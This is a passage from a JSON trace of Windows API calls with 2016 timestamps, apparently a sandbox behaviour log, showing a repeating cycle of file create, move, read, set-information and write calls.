"2016-02-16 17:41:39,819", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,819", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,819", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,829", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,829", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,829", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,829", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,829", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,829", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,829", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,829", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,839", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,839", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,839", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,839", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,839", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,839", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,839", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,839", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,849", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,849", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:39,849", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,849", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,859", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,859", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,859", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,859", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,859", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,869", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,869", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,869", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,869", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,869", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,869", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,869", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,869", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,879", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,879", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,879", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,879", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,879", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,879", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,879", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,910", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,910", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,910", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,910", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,910", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,910", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,910", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,910", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,920", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,920", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,920", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,920", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,920", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,920", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,920", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,920", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,930", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,930", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,930", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,930", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,930", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:39,930", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,930", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,930", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,940", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,940", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,950", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,950", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,950", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,950", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,950", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,950", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:39,950", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,960", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,960", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,960", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,960", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,960", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,960", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,970", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,970", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,970", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,970", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,970", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,970", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,980", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,980", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,980", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,980", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,980", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,980", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:39,990", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,990", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,990", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,990", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,990", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,990", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,000", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,000", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,000", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,000", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,000", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,010", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,010", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,010", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,010", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,010", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,010", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,010", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,020", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:40,020", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,020", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,020", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,020", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,030", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,030", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,030", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,030", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,030", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,030", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,030", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,030", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,040", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,040", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,040", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,040", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,040", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,040", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,040", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,040", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,050", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,050", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,050", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,050", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,050", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,050", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,050", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,050", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,050", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,050", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,060", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,060", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,060", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,060", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,060", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,060", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,060", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,060", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,070", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,070", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,070", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,070", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,070", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,070", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,080", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,080", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,090", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,090", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,090", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,090", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,090", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,090", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,090", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,090", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:40,090", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,090", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,090", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,100", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,100", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,100", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,100", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,100", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,100", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,100", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,100", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,110", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,110", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,120", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,120", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,120", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,120", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,120", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,120", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,130", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,130", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,130", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,130", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,130", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,130", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,140", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,140", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,140", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,140", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,140", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,140", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:40,140", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,140", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,150", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,150", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,150", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,150", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,150", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,150", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,160", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,160", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,160", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,160", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,160", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,160", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,160", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,160", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,160", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,170", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,170", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,170", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,170", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:40,170", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,170", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,170", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,170", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,170", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,180", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,180", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,180", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,180", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,180", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,180", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,180", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,180", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,190", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,190", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,190", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,190", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,190", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,190", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,200", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,200", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,200", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,200", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,210", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,210", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,210", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,210", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,210", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,220", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,220", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,220", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,220", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,220", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,220", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,220", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,230", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,230", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,230", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,230", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,230", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,230", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,230", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,240", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,240", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,240", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,240", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,240", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,240", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,240", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,240", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,240", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,250", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,250", "api": "NtWriteFile"}, 
